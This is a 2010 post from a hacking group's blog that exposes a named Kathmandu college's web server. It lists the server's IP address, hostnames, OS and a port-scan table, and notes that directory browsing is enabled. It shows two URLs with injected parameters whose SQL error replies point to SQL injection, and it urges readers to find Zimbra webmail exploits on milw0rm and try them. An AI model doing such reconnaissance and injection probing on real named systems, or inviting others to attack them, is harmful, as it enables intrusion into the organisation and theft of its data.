tag:blogger.com,1999:blog-33397232512037621292012-02-16T20:17:53.393-08:00Nep Sec || KtM-HaCKeRZ Security blognepali security and hacking team ktm hackerz shares and informs the vulnerabilities in Nepali websites and webservers. The one and only blog of first nepali hackers groupCool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.comBlogger401100tag:blogger.com,1999:blog-3339723251203762129.post-1655929784544060912010-07-18T08:56:00.001-07:002010-07-18T09:20:47.349-07:00Informatics college. Directory browsing enabled.Informatics college situated in Kathmandu promises its student that it will give you some knowledge about network security and all that fucking stuffz. Well the biggest problem is that the fuckers themself dont know about security. Take a look at this:
<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_oXLMHC4FG8I/TEMk3zmpDHI/AAAAAAAAAAM/4tn63jC4Kz8/s1600/upload.JPG"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_oXLMHC4FG8I/TEMk3zmpDHI/AAAAAAAAAAM/4tn63jC4Kz8/s400/upload.JPG" alt="" id="BLOGGER_PHOTO_ID_5495276511485824114" border="0" /></a>
<br />The following are the details of the server:
<br />hostname:informatics.edu.np
<br />uptime:803209s
<br />last reboot:Thu July 08 9:36:45 2010
<br />ip: 74.54.219.66
<br />hostnames:(name-type)
<br />informatics.edu.np-user
<br />lamborghini.websitewelcome.com-PTR
<br />OS-DD_WRT v23(linux kernel version 2.4.36)(ports used: 21,231)
<br />
<br />The details are as follows:
<br />
<br /><meta equiv="Content-Type" content="text/html; charset=utf-8"><meta name="ProgId" content="Word.Document"><meta name="Generator" content="Microsoft Word 11"><meta name="Originator" content="Microsoft Word 11"><link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CBishisht%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"><!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> </w:Compatibility> <w:browserlevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" latentstylecount="156"> </w:LatentStyles> </xml><![endif]--><style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman";} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;} div.Section1 {page:Section1;} --> </style><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ansi-language:#0400; mso-fareast-language:#0400; mso-bidi-language:#0400;} table.MsoTableGrid {mso-style-name:"Table Grid"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; border:solid windowtext 1.0pt; mso-border-alt:solid windowtext .5pt; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-border-insideh:.5pt solid windowtext; mso-border-insidev:.5pt solid windowtext; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ansi-language:#0400; mso-fareast-language:#0400; mso-bidi-language:#0400;} </style> <![endif]--> <table class="MsoTableGrid" style="border-collapse: collapse; border: medium none;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="width: 114.65pt; border: 1pt solid windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Port<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Protocol<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">State(0-open/x-filtered)<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Service/version<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">7<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">X<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">echo<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">9<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">X<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Discard<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">13<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">X<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Daytime<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">21<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">ftp/PureFTPd<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">22<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">X<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Ssh<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">25<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">X<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">SMTP<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">26<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Smtp/EximSMTPd 469<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">53<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Domain<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">80<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">http<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">110<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Pop3/CourierPOP3d<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">135<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">X<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Msrpc<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">139<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">X<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Netbios-ssn<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">143<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Imap/CourierIMAPd 2006 released<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">443<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";"><o:p> </o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">445<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">X<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Microsoft-ds<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">465<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";"><o:p> </o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">993<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Imap/CourierIMAPd2008 released<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">995<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">0<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";"><o:p> </o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">5800<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">X<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">Vnc-http<o:p></o:p></span></p> </td> </tr> <tr style=""> <td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">5900<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">TCP<o:p></o:p></span></p> </td> <td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">x<o:p></o:p></span></p> </td> <td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"> <p class="MsoNormal" style="text-align: justify;"><span style="font-family: "Courier New";">vnc<o:p></o:p></span></p> </td> </tr> </tbody></table>
<br />also more than that i think that it is vulnerable to the sqli attack
<br />
<br />url entered: http://www.informatics.edu.np/about_us.php?inst=asdasdvasdv
<br />returned: ERROR: Unknown column 'asdasdvasdv' in 'where clause'
<br />
<br />url entered:http://www.informatics.edu.np/course_matter.php?mid=asdvasdv
<br />returned: Unknown column 'asdvasdv' in 'where clause'
<br />
<br />also the college uses the webmail based in zimbra...you can look at milw0rm for the vuls of zimbra( i dont want to tell the which version it is....try this by your own)
<br />
